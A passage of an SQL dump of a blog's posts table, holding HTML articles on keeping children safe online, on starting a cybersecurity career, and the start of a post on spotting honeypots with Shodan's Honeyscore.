[&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Protecting Against Exposure to Harmful Content</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The internet is full of content that isn’t appropriate for young eyes, including violence, hate speech, and explicit material. 
Children who stumble upon such content may experience fear, confusion, or emotional discomfort. By being proactive, you can help ensure their online experiences are enriching instead of overwhelming.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Preventing Cyberbullying</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The anonymity of the internet unfortunately makes it a breeding ground for cyberbullying. Hurtful comments, social exclusion, and online harassment can have serious emotional and psychological impacts on kids. Monitoring their online interactions and fostering open communication can make a world of difference.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Protecting Personal Information</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Kids are often unaware of the consequences of oversharing personal information online. Identity theft, scams, or contact with harmful individuals become possibilities when privacy isn\'t maintained. Teaching your children about the value of safeguarding personal details will help keep them safe.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Reducing the Risk of Online Exploitation</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Predators often exploit the anonymity of online platforms. From seemingly harmless gaming chats to social media interactions, vulnerable children may unknowingly interact with individuals who do not have their best interests at heart. 
Monitoring their online activities can prevent these risks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Encouraging Healthy Screen Habits</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Excessive screen time has been linked to issues such as disrupted sleep patterns, difficulty concentrating, and reduced physical activity. By setting limits and encouraging offline activities, you can help your children develop a balanced, healthy lifestyle while enjoying the benefits of technology.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Proven Strategies for Keeping Kids Safe Online</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Protecting kids from the dangers of the internet doesn’t have to be overwhelming. Here are several practical and effective strategies that parents can adopt today:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Use Parental Control Software</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Parental control software is your first line of defense. These tools allow you to track your child’s online activities, block inappropriate content, and set time limits on device usage. 
Many parental control apps even provide detailed reports about the apps, websites, and platforms your child is using.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Popular parental control tools to consider:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Qustodio</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Bark</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Net Nanny</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Norton Family</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Regularly Check Their Devices</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Get in the habit of accessing your child’s devices, including smartphones, tablets, and laptops. Review their browsing history, installed apps, and digital downloads. While this step helps ensure transparency in their online behavior, remember to explain to your kids why regular checks are necessary.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
Monitor Social Media Usage</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media platforms are a mixed bag for children. While they allow kids to stay connected with friends, they can also be places where oversharing, cyberbullying, or exposure to inappropriate posts occur.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Encourage your children to use privacy settings, limit personal details in their profiles, and avoid interacting with strangers online. It may also be helpful to keep an eye on whom they’re communicating with and the content they’re sharing.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Foster Open Communication</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the most effective ways to protect your kids online is to keep the lines of communication open. 
Reassure them that they can approach you without fear if something they see online makes them uncomfortable.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Start conversations by asking questions like:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">\"What’s your favorite part of being online?\"</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">\"Have you seen anything online that made you feel uncomfortable recently?\"</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">\"How do you think people can stay safe while using social media or games?\"</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This kind of dialogue helps to create trust and empowers children to share their questions and concerns.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Set Limits for Screen Time</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Establish clear rules around how much time kids can spend online daily or weekly. 
Setting limits encourages them to take breaks, get outside for physical activities, and spend quality time with family.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider using features like Apple\'s \"Screen Time\" or Android\'s \"Digital Wellbeing\" to set restrictions automatically.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Educate Yourself on Online Trends</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The more you understand the latest technologies, social media platforms, and online trends, the better equipped you\'ll be to guide and protect your kids. Follow trusted parenting blogs, listen to podcasts, or even join online forums where parents discuss digital safety.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Striking the Right Balance</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While it’s important to monitor your child’s internet activities, it’s equally essential to respect their privacy and foster independence. 
Carve out boundaries that balance their need for online exploration with safety precautions.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Instead of looking at their personal chats without consent, agree that you’ll only check in specific situations where safety is in question.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Allow them to select some of their entertainment options while discussing what makes content safe or appropriate.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Empowering kids to recognize potential online dangers and make their own decisions with your guidance is one of the most effective ways to raise responsible digital citizens.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The digital landscape isn’t without its risks, but armed with the right strategies, you can help your children use the internet safely and confidently.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From leveraging parental control tools to fostering honest conversations, each step you take strengthens their online safety net. 
And remember, education is a two-way street—learning about the digital world together can be an excellent opportunity to bond with your kids while ensuring their well-being.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Do you have any tried-and-true tips for internet safety? Share your ideas in the comments below—we’d love to hear from you!</p>', '', NULL, NULL, 1, 'draft', '2024-02-21 03:26:03', '2026-01-12 21:41:44', 'CyberKids', 'Keep your kids safe from the dangers of the internet', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(138, 'How to Get into the Cybersecurity World', 'how-to-get-into-the-cybersecurity-world', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is one of the fastest-growing and most sought-after industries today. With the rapid expansion of digital technologies, organizations of every size are striving to protect their systems and data from cyber threats. For those intrigued by this dynamic and rewarding field, the opportunity to carve out a meaningful and impactful career is greater than ever.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But where do you begin? If the idea of defending against hackers and securing systems excites you, this guide will walk you through the essential steps needed to start and thrive in the world of cybersecurity.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Build a Strong Foundation in Computer Systems, Networks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding the basics is crucial in any field, and cybersecurity is no different. To excel in the job, it’s pivotal to have a comprehensive understanding of how computer systems and networks operate.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how you can strengthen your foundation:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Take Courses</strong></b>: Enroll in introductory courses in computer science, network administration, and programming. 
Platforms like Coursera, Udemy, and Codecademy offer relevant beginner- to advanced-level content.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Certifications</strong></b>: Certifications in networking and programming, such as Cisco’s CCNA or foundational courses in Python, JavaScript, or C++, can give you the technical baseline for your career.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This knowledge fuels your confidence in understanding the structure of modern technologies and prepares you for analyzing vulnerabilities in cyber systems.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Obtain Industry-Recognized Certifications</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Certifications serve as an official recognition of your skills and understanding of cybersecurity concepts. They not only bolster your resume but also show potential employers that you’re committed to mastering your craft. 
Some of the most respected and widely recognized certifications include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">CompTIA Security+</strong></b> – A great starting point for beginners that covers core cybersecurity principles.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Certified Ethical Hacker (CEH)</strong></b> – Provides expertise in penetration testing and identifying vulnerabilities like a “white-hat” hacker.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Certified Information Systems Security Professional (CISSP)</strong></b> – Ideal for those looking to specialize in advanced security management.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These certifications open doors to more job opportunities and can often serve as prerequisites for various cybersecurity roles. Many can be completed online, making it easier to integrate education into your schedule.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Gain Hands-On, Practical Experience</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Theory and certifications set a great foundation, but practical experience truly prepares you for the challenges of a real-world cybersecurity career. 
Employers value tangible skills, so actively seek opportunities that allow you to practice what you’ve learned.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Some ways to gain hands-on experience include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Internships</strong></b> – Work for cybersecurity firms, tech companies, or even small businesses looking to strengthen their security infrastructure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Capture the Flag (CTF) Events</strong></b> – Compete in cybersecurity challenges that simulate real-world attacks and problem-solving scenarios.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Open-Source Contributions</strong></b> – Collaborate on GitHub or open-source cybersecurity projects to expand your experience.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Personal Projects</strong></b> – Build a home lab to conduct your own penetration testing or explore vulnerability assessments.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The more hands-on exposure you have, the more confident and valuable you’ll be as a professional in the field.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] 
[&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4: Network with Industry Professionals</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity industry thrives on collaboration and the exchange of knowledge. Networking presents a critical avenue for staying connected with industry trends and developing relationships that can spark opportunities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ways to build a professional network in cybersecurity:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Attend <b><strong class=\"font-bold\">industry events and conferences</strong></b>, such as Black Hat and DEF CON, to meet other professionals and learn about cutting-edge innovations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Join <b><strong class=\"font-bold\">online forums and communities</strong></b> like Reddit (subreddits such as r/cybersecurity or r/netsec) or LinkedIn groups dedicated to cybersecurity discussions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Participate in <b><strong class=\"font-bold\">meetups or local workshops</strong></b>, where you can engage with others in your area who share the same career interests.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These steps help you develop mentorship connections, discover career opportunities, and continuously learn from your peers.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] 
[&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 5: Consider a Degree in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Although not always required, earning a degree in cybersecurity, computer science, or information technology can open more doors for career advancement. A degree provides in-depth theoretical knowledge as well as hands-on practice, often through university labs or internships.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Degrees like these are especially valuable if you aspire to pursue roles in senior management or specialized areas, such as designing security systems for enterprises. If you’re aiming for a generalist’s path or self-teaching, however, a degree may not always be necessary depending on the employer\'s requirements.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 6: Stay Ahead with the Latest Trends and Technologies</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyber threats are dynamic, with attackers constantly devising new techniques and vulnerabilities to exploit. 
To stay effective as a cybersecurity professional, it’s essential to continuously update your knowledge of emerging trends, tools, and best practices.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how you can stay ahead:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Read Industry Publications</strong></b> – Subscribe to platforms like WIRED, Dark Reading, or CSO Online for timely updates on threats and cybersecurity technologies.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Continuing Education</strong></b> – Regularly enroll in new certification courses or advanced training on the latest developments in cybersecurity.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Podcasts and Webinars</strong></b> – Explore conversations about current threats and mitigations through professional discussions online.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Certifications Renewal</strong></b> – Keep your certifications current by participating in refresher or re-certification exams periodically.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Being proactive in your learning ensures that you remain a step ahead of evolving threats and competitive in the job market.</p>\r\n\r\n<h2 class=\"font-bold text-h3 
leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why a Career in Cybersecurity is Exciting</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The field of cybersecurity combines technical acumen with problem-solving creativity, offering an intellectually stimulating career path. Beyond the personal rewards, however, cybersecurity professionals play a vital role in protecting the individual, organizational, and even national economy. You’ll have the chance to influence how safe technology operates for billions of users.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you’re defending systems from attackers, securing personal data, or helping optimize processes for organizations, every day is a new challenge in this field.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Starting your cybersecurity career may seem intimidating at first, but with consistent effort and dedication, it is an achievable—and immensely rewarding—goal. Focus on building your technical capabilities, obtaining certifications, gaining practical experience, and remaining engaged with professionals in the field.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you\'re ready to explore the first step, it might be time to sign up for your first cybersecurity course or certification program. Equip yourself with the foundational skills and a forward-thinking mindset to tackle modern-day digital threats, and you’ll launch a career that’s as impactful as it is future-proof.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn’t just a career; it’s a commitment to creating a safer, better-connected world. 
Now is the time to make that commitment.</p>', '', NULL, NULL, 1, 'draft', '2024-02-20 03:27:09', '2026-01-12 21:41:44', 'Information Security', 'How to Get into the Cybersecurity World', '', NULL),
(139, 'The Dual Nature of Shodan.io: Friend or Foe?', 'the-dual-nature-of-shodan-io-friend-or-foe', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is a fascinating field with endless learning opportunities. Even after nearly two decades in IT, I\'m still amazed by how much there is to discover. Recently, I learned about an intriguing method to determine if a public IP address is a honeypot. This realization has sparked thought-provoking discussions about the dual nature of honeypots and their role in the ongoing battle between defenders and attackers in the cyber realm.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is a Honeypot?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A honeypot is a decoy system designed to lure cyber attackers. These setups mimic real systems, creating an environment where attackers believe they’ve found a legitimate target. By attracting and engaging attackers, honeypots provide an invaluable opportunity for defenders to monitor, analyze, and learn from malicious activities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Honeypots can be as simple as emulating a single service or as advanced as replicating an entire system. 
Their primary role is to serve as a trap, giving defenders the chance to observe hacking techniques, identify vulnerabilities, and refine their security strategies based on real-world insights.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Discovery Process: Checking for Honeypots</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The recent realization that tools like Shodan can identify public IP addresses associated with honeypots is particularly exciting. Shodan, often referred to as the \"Google for devices,\" is a powerful search engine that scans the internet for information about devices connected to public IP addresses. It provides data on exposed services, open ports, and other useful metrics.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><a href=\"https://honeyscore.shodan.io/\">Using Shodan to Detect Honeypots</a></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s a straightforward method to detect potential honeypots using Shodan:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><a href=\"https://shodan.io/\"><b><strong class=\"font-bold\">Access Shodan</strong></b></a></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Visit Shodan’s website and enter the public IP address you want to investigate.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 
[&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Analyze the Results</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Review the output, looking for unusual open ports, unexpected services, or other irregularities that deviate from standard device behavior.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Identify Indicators</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If the analysis reveals anomalies or patterns inconsistent with typical system layouts, the IP address in question might be a honeypot.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tools like Shodan’s Honeyscore (https://honeyscore.shodan.io/) can make this process even more streamlined by assigning scores based on the likelihood of an IP being a honeypot.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] 